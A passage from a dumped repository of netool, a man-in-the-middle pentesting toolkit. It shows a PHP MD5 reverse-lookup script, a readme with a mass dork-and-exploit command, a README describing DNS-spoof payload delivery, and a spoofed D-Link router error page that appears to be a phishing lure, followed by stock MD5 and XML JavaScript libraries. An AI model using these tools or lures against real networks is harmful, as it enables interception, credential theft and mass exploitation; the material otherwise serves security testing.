-------------------------------------------------------------------------------- 1 | MD5 conversion and MD5 reverse lookup')) { 89 | echo "\n\033[02;31m[ {$_SESSION['config']['cont2']} ]=>MD5=>\033[1;37m{$md5}\033[0m \ SENHA:: {$result}"; 90 | echo "\033[0m\n\r-------------------------------------------------------------------------\n\r"; 91 | $_SESSION['config']['cont2'] ++; 92 | } else { 93 | renovaTOR(); 94 | } 95 | } 96 | } 97 | if (isset($opcoes['md5']) && !empty($opcoes['md5'])) { //arquivo 98 | echo menu() . "[+]Loading...\n\r"; 99 | msg($opcoes['md5'], $opcoes); 100 | } 101 | if (isset($opcoes['file']) && !empty($opcoes['file'])) { //arquivo 102 | $ponteiro = fopen($opcoes['file'], "r"); 103 | echo menu() . "[+]Loading...\n\r"; 104 | while (!feof($ponteiro)) { 105 | $md5 = str_replace("\t", '', str_replace("\n", '', str_replace("\r", '', fgets($ponteiro, 4096)))); 106 | !empty($md5) ? msg($md5, $opcoes) : NULL; 107 | } 108 | fclose($ponteiro); 109 | } 110 | echo!isset($opcoes['file']) && !isset($opcoes['md5']) ? menu() : NULL; 111 | unset($_SESSION); 112 | -------------------------------------------------------------------------------- /INURLBR/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 0xGRUPO GOOGLEINURL BRASIL - ADVANCED RESEARCH. 4 | 0xSCRIPT NAME: INURLBR 5 | 0xAUTOR: Cleiton Pinheiro 6 | 0xNick: Googleinurl 7 | 0xBlog: http://blog.inurl.com.br 8 | 0xtwitter: /@googleinurl 9 | 0xfacebook: /InurlBrasil 10 | 0xVersão: 1.0.1 11 | 12 | 13 | 14 | 15 | [ INURLBR + NETOOL TOOLKIT INTERACTION ] 16 | +===========================================================================================+ 17 | | | 18 | | GOOGLEINURL WORK PATH : /usr/bin | 19 | | GOOGLEINURL T00LKIT PATH : /root/opensource/INURLBR | 20 | | LOGFILES STORAGE : /root/opensource/logs | 21 | | EXTERNAL SCRIPTS : http://pastebin.com/u/Googleinurl | 22 | | | 23 | | USING EXPLOITS : --comand-all "php //exploit.php _TARGET_" | 24 | | EXAMPLE : inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,2,10 -s save.log | 25 | | --comand-all "php /root/opensource/INURLBR/exploit.php _TARGET_" | 26 | | | 27 | +===========================================================================================+ 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![Version](https://img.shields.io/badge/NETOOL-4.6-brightgreen.svg?maxAge=259200)]() 2 | [![Stage](https://img.shields.io/badge/Release-stable-blue.svg)]() 3 | [![Build](https://img.shields.io/badge/Supported_OS-linux-orange.svg)]() 4 | [![Github All Releases](https://img.shields.io/github/downloads/atom/atom/total.svg)]() 5 | [![AUR](https://img.shields.io/aur/license/yaourt.svg)]() 6 | 7 | 8 | # NETOOL - MitM pentesting toolkit [ scan/sniff/exploit ] 9 | Version release : v4.6 10 | Author : pedro ubuntu [ r00t-3xp10it ] 11 | Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS 12 | Suspicious-Shell-Activity (SSA) RedTeam develop @2016 13 | 14 | # LEGAL DISCLAMER 15 | The author does not hold any responsibility about the bad use of this script, 16 | remmenber that attacking targets without prior concent its ilegal and punish 17 | by law, However you are allowed to protect yourselfe from any intruder by any 18 | meens necessary (using this tool the ethical way) please read the license. 19 | 20 | 21 | 22 | # Framework description 23 | netool.sh toolkit provides a fast and easy way For new arrivals to IT security 24 | pentesting and also to experience users to use allmost all features that the 25 | Man-In-The-Middle can provide under local lan, since scanning, sniffing and 26 | social engeneering attacks (metasploit & veil needs to be manually installed) 27 | 28 | netool toolkit its 'divided' in 3 diferent categories, the first stage it will 29 | be scanning/gathering-information using Nmap framework, the second stage it will 30 | be sniffing/manipulation-of-tcp-packets using Ettercap framework and the last stage 31 | it will be using 'rootsector' module to deliver a payload to target (mitm+dns_spoof) 32 | 33 | # Framework additional settings 34 | Additional tool settings can be configurated just by editing the 'toolkit_config' 35 | file befor running the tool, settings like: config paths to frameworks installed, 36 | and some internal toolkit settings. 37 | 38 | # Dependencies 39 | Toolkit Dependencies : zenity, Nmap, Ettercap, Macchanger, Metasploit, Driftnet, Apache2, sslstrip 40 | INURLBR Dependencies : curl, libcurl3, libcurl3-dev, php5, php5-cli, php5-curl 41 | 42 | 43 | 44 | # Download/Install 45 | 1º - Download framework from github 46 | tar.gz OR zip OR git clone 47 | 48 | 2º - Install dependencies 49 | cd opensource 50 | sudo chmod +x INSTALL.sh && ./INSTALL.sh 51 | 52 | 3º - Run main tool 53 | sudo ./netool.sh 54 | 55 | # Credits 56 | Fyodor (nmap) | Alor & Naga (ettercap) | HD Moore (metasploit) 57 | Moxie M (sslstrip) | Chris L (driftnet) | j0rgan (cupp.py) 58 | ReL1K (unicorn.py) | Cleiton P (inurlbr.php) | KyRecon (shellter) 59 | Chris Tyler (zenity) and Rob McCool (apache). 60 | 61 | 62 | _EOF 63 | 64 | -------------------------------------------------------------------------------- /files/DLINK/img_wireless_bottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/DLINK/img_wireless_bottom.gif -------------------------------------------------------------------------------- /files/DLINK/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 not found 4 | 5 | 6 | 7 | 8 | 9 |

we're sorry, but something went wrong. 10 | 11 | 'Please clear cache (cookies) and re-open your browser to access network'
12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /files/DLINK/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/DLINK/logo.gif -------------------------------------------------------------------------------- /files/DLINK/md5.js: -------------------------------------------------------------------------------- 1 | /* 2 | * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message 3 | * Digest Algorithm, as defined in RFC 1321. 4 | * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. 5 | * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet 6 | * Distributed under the BSD License 7 | * See http://pajhome.org.uk/crypt/md5 for more info. 8 | */ 9 | 10 | /* 11 | * Configurable variables. You may need to tweak these to be compatible with 12 | * the server-side, but the defaults work in most cases. 13 | */ 14 | var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */ 15 | var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */ 16 | var chrsz = 8; /* bits per input character. 8 - ASCII; 16 - Unicode */ 17 | 18 | /* 19 | * These are the functions you'll usually want to call 20 | * They take string arguments and return either hex or base-64 encoded strings 21 | */ 22 | function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));} 23 | function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));} 24 | function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));} 25 | function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); } 26 | function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); } 27 | function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); } 28 | 29 | /* 30 | * Perform a simple self-test to see if the VM is working 31 | */ 32 | function md5_vm_test() 33 | { 34 | return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72"; 35 | } 36 | 37 | /* 38 | * Calculate the MD5 of an array of little-endian words, and a bit length 39 | */ 40 | function core_md5(x, len) 41 | { 42 | /* append padding */ 43 | x[len >> 5] |= 0x80 << ((len) % 32); 44 | x[(((len + 64) >>> 9) << 4) + 14] = len; 45 | 46 | var a = 1732584193; 47 | var b = -271733879; 48 | var c = -1732584194; 49 | var d = 271733878; 50 | 51 | for(var i = 0; i < x.length; i += 16) 52 | { 53 | var olda = a; 54 | var oldb = b; 55 | var oldc = c; 56 | var oldd = d; 57 | 58 | a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); 59 | d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); 60 | c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); 61 | b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); 62 | a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); 63 | d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); 64 | c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); 65 | b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); 66 | a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); 67 | d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); 68 | c = md5_ff(c, d, a, b, x[i+10], 17, -42063); 69 | b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162); 70 | a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); 71 | d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); 72 | c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); 73 | b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); 74 | 75 | a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); 76 | d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); 77 | c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); 78 | b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); 79 | a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691); 80 | d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); 81 | c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); 82 | b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); 83 | a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); 84 | d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); 85 | c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); 86 | b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); 87 | a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); 88 | d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); 89 | c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); 90 | b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); 91 | 92 | a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); 93 | d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); 94 | c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); 95 | b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); 96 | a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); 97 | d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); 98 | c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); 99 | b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); 100 | a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); 101 | d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); 102 | c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); 103 | b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); 104 | a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); 105 | d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); 106 | c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); 107 | b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); 108 | 109 | a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); 110 | d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); 111 | c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); 112 | b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); 113 | a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); 114 | d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); 115 | c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); 116 | b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); 117 | a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); 118 | d = md5_ii(d, a, b, c, x[i+15], 10, -30611744); 119 | c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); 120 | b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); 121 | a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); 122 | d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); 123 | c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); 124 | b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); 125 | 126 | a = safe_add(a, olda); 127 | b = safe_add(b, oldb); 128 | c = safe_add(c, oldc); 129 | d = safe_add(d, oldd); 130 | } 131 | return Array(a, b, c, d); 132 | 133 | } 134 | 135 | /* 136 | * These functions implement the four basic operations the algorithm uses. 137 | */ 138 | function md5_cmn(q, a, b, x, s, t) 139 | { 140 | return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b); 141 | } 142 | function md5_ff(a, b, c, d, x, s, t) 143 | { 144 | return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t); 145 | } 146 | function md5_gg(a, b, c, d, x, s, t) 147 | { 148 | return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t); 149 | } 150 | function md5_hh(a, b, c, d, x, s, t) 151 | { 152 | return md5_cmn(b ^ c ^ d, a, b, x, s, t); 153 | } 154 | function md5_ii(a, b, c, d, x, s, t) 155 | { 156 | return md5_cmn(c ^ (b | (~d)), a, b, x, s, t); 157 | } 158 | 159 | /* 160 | * Calculate the HMAC-MD5, of a key and some data 161 | */ 162 | function core_hmac_md5(key, data) 163 | { 164 | var bkey = str2binl(key); 165 | if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz); 166 | 167 | var ipad = Array(16), opad = Array(16); 168 | for(var i = 0; i < 16; i++) 169 | { 170 | ipad[i] = bkey[i] ^ 0x36363636; 171 | opad[i] = bkey[i] ^ 0x5C5C5C5C; 172 | } 173 | 174 | var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz); 175 | return core_md5(opad.concat(hash), 512 + 128); 176 | } 177 | 178 | /* 179 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 180 | * to work around bugs in some JS interpreters. 181 | */ 182 | function safe_add(x, y) 183 | { 184 | var lsw = (x & 0xFFFF) + (y & 0xFFFF); 185 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 186 | return (msw << 16) | (lsw & 0xFFFF); 187 | } 188 | 189 | /* 190 | * Bitwise rotate a 32-bit number to the left. 191 | */ 192 | function bit_rol(num, cnt) 193 | { 194 | return (num << cnt) | (num >>> (32 - cnt)); 195 | } 196 | 197 | /* 198 | * Convert a string to an array of little-endian words 199 | * If chrsz is ASCII, characters >255 have their hi-byte silently ignored. 200 | */ 201 | function str2binl(str) 202 | { 203 | var bin = Array(); 204 | var mask = (1 << chrsz) - 1; 205 | for(var i = 0; i < str.length * chrsz; i += chrsz) 206 | bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32); 207 | return bin; 208 | } 209 | 210 | /* 211 | * Convert an array of little-endian words to a string 212 | */ 213 | function binl2str(bin) 214 | { 215 | var str = ""; 216 | var mask = (1 << chrsz) - 1; 217 | for(var i = 0; i < bin.length * 32; i += chrsz) 218 | str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask); 219 | return str; 220 | } 221 | 222 | /* 223 | * Convert an array of little-endian words to a hex string. 224 | */ 225 | function binl2hex(binarray) 226 | { 227 | var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; 228 | var str = ""; 229 | for(var i = 0; i < binarray.length * 4; i++) 230 | { 231 | str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + 232 | hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); 233 | } 234 | return str; 235 | } 236 | 237 | /* 238 | * Convert an array of little-endian words to a base-64 string 239 | */ 240 | function binl2b64(binarray) 241 | { 242 | var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 243 | var str = ""; 244 | for(var i = 0; i < binarray.length * 4; i += 3) 245 | { 246 | var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16) 247 | | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 ) 248 | | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF); 249 | for(var j = 0; j < 4; j++) 250 | { 251 | if(i * 8 + j * 6 > binarray.length * 32) str += b64pad; 252 | else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F); 253 | } 254 | } 255 | return str; 256 | } 257 | 258 | function md5_js_loaded() { return true; } 259 | -------------------------------------------------------------------------------- /files/DLINK/substyle_DIR-615.css: -------------------------------------------------------------------------------- 1 | /* CSS substyle for variations applicable to specific products */ 2 | 3 | #modnum_image { 4 | width: 125px; 5 | height: 25px; 6 | background-image: url(short_modnum_DIR-615.gif); 7 | } -------------------------------------------------------------------------------- /files/DLINK/xml_data.js: -------------------------------------------------------------------------------- 1 | /* 2 | * xmlData class. 3 | * Provides a mechanism to retrieve an XML document from the server and then extract its data. 4 | * 5 | * As a first it tries to use the XML DOM model for document retrieval. 6 | * Failing that, we revert to using the XMLHTTP model. 7 | */ 8 | 9 | /* 10 | * Constants for the XML DOM state changes. 11 | */ 12 | var XML_UNINITIALIZED = 0; 13 | var XML_LOADING = 1; 14 | var XML_LOADED = 2; 15 | var XML_INTERACTIVE = 3; 16 | var XML_COMPLETED = 4; 17 | 18 | /* 19 | * Global level code that detects if the browser supports the DOMParser method. 20 | * If it doesn't then we make our own compatibility version! 21 | */ 22 | if (typeof DOMParser == "undefined") { 23 | DOMParser = function () 24 | { 25 | } 26 | 27 | DOMParser.prototype.parseFromString = function (str, content_type) 28 | { 29 | if (typeof ActiveXObject != "undefined") { 30 | var d = new ActiveXObject("MSXML.DomDocument"); 31 | d.loadXML(str); 32 | return d; 33 | } 34 | if (typeof XMLHttpRequest != "undefined") { 35 | var req = new XMLHttpRequest; 36 | req.open("GET", "data:" + (contentType || "application/xml") + 37 | ";charset=utf-8," + encodeURIComponent(str), false); 38 | if (req.overrideMimeType) { 39 | req.overrideMimeType(contentType); 40 | } 41 | req.send(null); 42 | return req.responseXML; 43 | } 44 | return null; 45 | } 46 | } 47 | 48 | function xmlDataObject_getDocument() 49 | { 50 | if (this.xmlDoc.responseXML != null) 51 | return this.xmlDoc.responseXML; 52 | return this.xmlDoc; 53 | } 54 | 55 | /* 56 | * xmlDataObject_getElementData() 57 | * 58 | * Use the W3C DOM method for finding a tag and 59 | * returning the data content. 60 | */ 61 | function xmlDataObject_getElementData(tag_name) 62 | { 63 | /* 64 | * Slight difference depending on Mozilla/IE and Opera on how we get the XML elements 65 | */ 66 | var tag = null; 67 | try { 68 | tag = this.xmlDoc.getElementsByTagName(tag_name); 69 | } catch (e) { 70 | try { 71 | tag = this.xmlDoc.responseXML.getElementsByTagName(tag_name); 72 | } catch (ee) { 73 | return null; 74 | } 75 | } 76 | 77 | try { 78 | if (tag.length == 0) { 79 | return null; 80 | } 81 | var node = tag[0].firstChild; 82 | if (node == null) { 83 | return null; 84 | } 85 | return node.nodeValue; 86 | } catch (e) { 87 | return null; 88 | } 89 | } 90 | 91 | /* 92 | * xmlDataObject_createXMLDocument() 93 | * Creates the object used to retrieve the XML resource 94 | * 95 | * Returns true if able to create an XML retrieval document, else false. 96 | */ 97 | function xmlDataObject_createXMLDocument() 98 | { 99 | /* 100 | * Create a variable that _is_ this object so that the anonymous 101 | * functions can access it 102 | */ 103 | var xmlDataInstance = this; 104 | 105 | /* 106 | * Create an XML DOM for retrieving the data 107 | */ 108 | if ((typeof document.implementation == "object") && (typeof document.implementation.createDocument == "function")) { 109 | /* 110 | * This is Mozilla (and others) compatible and is the preferred standard for retrieving an XML document. 111 | */ 112 | this.xmlDoc = document.implementation.createDocument("", "", null); 113 | 114 | /* 115 | * Opera browsers do not support this method, however, even though they say they can! 116 | */ 117 | if (typeof this.xmlDoc.load != "undefined") { 118 | /* 119 | * Supported properly 120 | */ 121 | this.xmlDoc.onload = function () { 122 | /* 123 | * Loading can complete in error! 124 | * If there is no data then ignore (wait for timeout). 125 | */ 126 | if (xmlDataInstance.xmlDoc.firstChild == null) { 127 | return; 128 | } 129 | 130 | /* 131 | * Mozilla sets this in case of invalid XML. 132 | */ 133 | if (xmlDataInstance.xmlDoc.firstChild.nodeName == 'parsererror') { 134 | return; 135 | } 136 | 137 | /* 138 | * Clear the timeout and signal success 139 | */ 140 | window.clearTimeout(xmlDataInstance.timeoutId); 141 | xmlDataInstance.timeoutId = 0; 142 | xmlDataInstance.dataReadyFunc(xmlDataInstance); 143 | } 144 | return true; 145 | } 146 | 147 | /* 148 | * Drop through and try Microsoft and Opera 149 | */ 150 | this.xmlDoc = null; 151 | } 152 | 153 | /* 154 | * Try IE and Opera flavours 155 | */ 156 | try { 157 | this.xmlDoc = new ActiveXObject("MSXML2.FreeThreadedDOMDocument.4.0"); 158 | } catch (e) { 159 | try { 160 | this.xmlDoc = new ActiveXObject("MSXML2.FreeThreadedDOMDocument.3.0"); 161 | } catch (e2) { 162 | try { 163 | this.xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); 164 | } catch (e3) { 165 | try { 166 | this.xmlDoc = new ActiveXObject("Msxml2.XMLHTTP"); 167 | } catch (e4) { 168 | try { 169 | this.xmlDoc = new ActiveXObject("Microsoft.XMLHTTP"); 170 | } catch (e5) { 171 | try { 172 | this.xmlDoc = new XMLHttpRequest(); 173 | } catch (e6) { 174 | /* 175 | * Old unsupported browser. 176 | */ 177 | return false; 178 | } 179 | } 180 | } 181 | } 182 | } 183 | } 184 | 185 | this.xmlDoc.onreadystatechange = function () { 186 | if (xmlDataInstance.xmlDoc.readyState == XML_COMPLETED) { 187 | if (xmlDataInstance.operaRepeatedCompletionCallBugFix) { 188 | return; 189 | } 190 | 191 | /* 192 | * Opera browsers have a repeated call bug 193 | */ 194 | xmlDataInstance.operaRepeatedCompletionCallBugFix = true; 195 | 196 | /* 197 | * Some browsers have a status field that reports the GET HTML status. 198 | * GGG - For some reason IE does not generate an exception that can be caught with try...catch for this field 199 | */ 200 | if (typeof xmlDataInstance.xmlDoc.status != "undefined") { 201 | if (xmlDataInstance.xmlDoc.status != 200) { 202 | /* 203 | * Rely on timeout 204 | */ 205 | return; 206 | } 207 | } else { 208 | /* 209 | * For browsers that do not have a status field, see if there are any XML elements 210 | */ 211 | try { 212 | if (xmlDataInstance.xmlDoc.firstChild == null) { 213 | /* 214 | * Rely on timeout 215 | */ 216 | return; 217 | } 218 | } catch (ee) { 219 | try { 220 | if (xmlDataInstance.xmlDoc.responseXML.firstChild == null) { 221 | /* 222 | * Rely on timeout 223 | */ 224 | return; 225 | } 226 | } catch (eee) { 227 | /* 228 | * Rely on timeout 229 | */ 230 | return; 231 | } 232 | } 233 | } 234 | 235 | window.clearTimeout(xmlDataInstance.timeoutId); 236 | xmlDataInstance.timeoutId = 0; 237 | xmlDataInstance.dataReadyFunc(xmlDataInstance); 238 | } 239 | } 240 | return true; 241 | } 242 | 243 | /* 244 | * xmlDataObject_initialiseFromString() 245 | * Using the given string, initialise the instance XML document. 246 | */ 247 | function xmlDataObject_initialiseFromString(xml_string) 248 | { 249 | var parser = new DOMParser(); 250 | this.xmlDoc = parser.parseFromString(xml_string, "text/xml"); 251 | } 252 | 253 | /* 254 | * xmlDataObject_retrieveData() 255 | * Begin retrieval. 256 | * 257 | * Returns false if unable to perform XML retrieval. 258 | */ 259 | function xmlDataObject_retrieveData() 260 | { 261 | /* 262 | * Ensure document retrieval is possible 263 | */ 264 | if (this.xmlDoc == null) { 265 | return false; 266 | } 267 | 268 | /* 269 | * Create a local variable that is an anonymous function to be evaluated when the timeout occurs. 270 | * The anonymous function will have access to the xmlDataObject instance! 271 | */ 272 | var xmlDataInstance = this; 273 | var fnx = function() { 274 | /* 275 | * Destroy the existing document. 276 | */ 277 | if (xmlDataInstance.xmlDoc.abort) { 278 | xmlDataInstance.xmlDoc.abort(); 279 | } 280 | xmlDataInstance.operaRepeatedCompletionCallBugFix = false; 281 | 282 | /* 283 | * Invoke the timeout callback function 284 | */ 285 | xmlDataInstance.dataTimeoutFunc(xmlDataInstance); 286 | 287 | /* 288 | * Timer has stopped 289 | */ 290 | this.timeoutId = 0; 291 | } 292 | this.timeoutId = window.setTimeout(fnx, this.timeoutMillis); 293 | 294 | /* 295 | * Reset the opera bug fix flag 296 | */ 297 | this.operaRepeatedCompletionCallBugFix = false; 298 | 299 | /* 300 | * Start the loading of the resource 301 | */ 302 | try { 303 | /* 304 | * XML model 305 | */ 306 | this.xmlDoc.async="true"; 307 | this.xmlDoc.load(this.dataURL); 308 | } catch (e) { 309 | try { 310 | /* 311 | * HTTP XML request. 312 | */ 313 | this.xmlDoc.open('GET', this.dataURL, true); 314 | 315 | /* 316 | * Safari 1.3 bug - need to force Safari to always reload 317 | */ 318 | if (this.xmlDoc.setRequestHeader) { 319 | this.xmlDoc.setRequestHeader('If-Modified-Since', 'Wed, 15 Nov 1995 00:00:00 GMT'); 320 | } 321 | 322 | /* 323 | * Issue the request 324 | */ 325 | this.xmlDoc.send(); 326 | } catch (ee) { 327 | /* 328 | * Rely on timeout 329 | */ 330 | return false; 331 | } 332 | } 333 | return true; 334 | } 335 | 336 | /* 337 | * xmlDataObject_stopRetrieval() 338 | * Stop retrieval (if in progress). 339 | */ 340 | function xmlDataObject_stopRetrieval() 341 | { 342 | /* 343 | * Destroy the existing document. 344 | */ 345 | if (this.xmlDoc.abort) { 346 | this.xmlDoc.abort(); 347 | } 348 | this.operaRepeatedCompletionCallBugFix = false; 349 | if (this.timeoutId != 0) { 350 | window.clearTimeout(this.timeoutId); 351 | this.timeoutId = 0; 352 | } 353 | } 354 | 355 | /* 356 | * xmlDataObject() 357 | * Create an XML data object. 358 | * 359 | * Used to retrieve data from the server in XML format. 360 | * The given function is invoked when the data is retrieved. 361 | */ 362 | function xmlDataObject(dataReadyFunc, dataTimeoutFunc, timeoutMillis, dataURL) 363 | { 364 | /* 365 | * Initialise properties. 366 | */ 367 | this.dataReadyFunc = dataReadyFunc; 368 | this.dataTimeoutFunc = dataTimeoutFunc || xmlDataObject_dataTimeoutFunc; 369 | this.dataURL = dataURL; 370 | this.timeoutMillis = timeoutMillis || 6000; 371 | this.extendedTimeoutMillis = 20000; 372 | this.timeoutId = 0; 373 | this.xmlDoc = null; 374 | 375 | this.operaRepeatedCompletionCallBugFix = false; /* To fix opera bug on getting called back more than once */ 376 | 377 | /* 378 | * Initialize the public methods 379 | */ 380 | this.retrieveData = xmlDataObject_retrieveData; 381 | this.stopRetrieval = xmlDataObject_stopRetrieval; 382 | this.getElementData = xmlDataObject_getElementData; 383 | this.getDocument = xmlDataObject_getDocument; 384 | this.initialiseFromString = xmlDataObject_initialiseFromString; 385 | 386 | /* 387 | * Initialise private methods 388 | */ 389 | this.createXMLDocument = xmlDataObject_createXMLDocument; 390 | 391 | /* 392 | * Create our XML retrieval document 393 | * NOTE: We only create one and constantly re-use it. 394 | */ 395 | this.createXMLDocument(); 396 | 397 | /* 398 | * Register this instance with a function that is to be invoked when the browser closes. 399 | * NOTE: We use the onunload event to stop XML transfers as this could hold up web browsing while 400 | * outstanding transfers complete. 401 | */ 402 | var xmlDataInstance = this; 403 | var fnx = function() { 404 | xmlDataInstance.stopRetrieval(); 405 | } 406 | add_onunload_listener(fnx); 407 | } 408 | 409 | /* 410 | * XSLT Processor class. 411 | * This class encapsulates the differences between Firefox's and IE's XSLT interfaces, 412 | * providing an external interface that is consistent across browsers. The general 413 | * method for using this class is as follows: 414 | * 1) Create an xsltProcessingObject 415 | * 2) Retrieve its data and wait for a callback 416 | * 3) In the callback function, apply a transformation on an XML data object and 417 | * apply the results to an existing HTML element. 418 | * 419 | * Here is the complete code for a typical usage: 420 | * 421 | * var xmlData = // Some XMLDocument - use xmlDataObject or XMLDocument, for example. 422 | * var xslt = new xsltProcessingObject(dataReady, timeout, 6000, "/transform.xslt"); 423 | * function PageLoad() 424 | * { 425 | * xslt.retrieveData(); 426 | * } 427 | * 428 | * function dataReady() 429 | * { 430 | * var parentNode = window.document.getElementById("xslt_target"); 431 | * xslt.transform(xmlData, window.document, parentNode); 432 | * parentNode.style.display = ""; // Make it visible 433 | * // Now the transformation results have been added to parentNode 434 | * } 435 | * 436 | * function timeout() 437 | * { 438 | * alert("Timeout"); 439 | * } 440 | * 441 | * // More scripting and HTML here... 442 | * 443 | * 444 | * // More HTML here... 445 | * 446 | * // More HTML here... 447 | */ 448 | function xsltProcessingObject(dataReadyFunc, dataTimeoutFunc, timeoutMillis, dataURL) 449 | { 450 | // This allows anonymous functions called from a different object scope to be 451 | // able to access the variable. 452 | var copy = this; 453 | 454 | this.platformMoz = (document.implementation && document.implementation.createDocument); 455 | this.platformIE6 = (!this.platformMoz && document.getElementById && window.ActiveXObject); 456 | this.xsltUrl = dataURL; 457 | this.dataReady = dataReadyFunc; 458 | this.retrieveData = xslt_RetrieveData; 459 | this.transform = xslt_Transform; 460 | this.sheetReady = function(xmlDoc) 461 | { 462 | /* 463 | * When the document has finished loading, we first initialize the parser 464 | * (by compiling the stylesheet), and then tell the client that we are ready 465 | * to perform transformations. 466 | */ 467 | copy.initParser(xmlDoc); 468 | copy.dataReady(xmlDoc); // Call the client's callback function 469 | }; 470 | 471 | this.initParser = xslt_InitParser; 472 | this.createEmptyDocument = xslt_createEmptyDocument; 473 | this.data = new xmlDataObject(this.sheetReady, dataTimeoutFunc, timeoutMillis, dataURL); 474 | this.addParameter = xslt_AddParameter; 475 | this.processor = null; 476 | } 477 | 478 | /* 479 | * Compile the 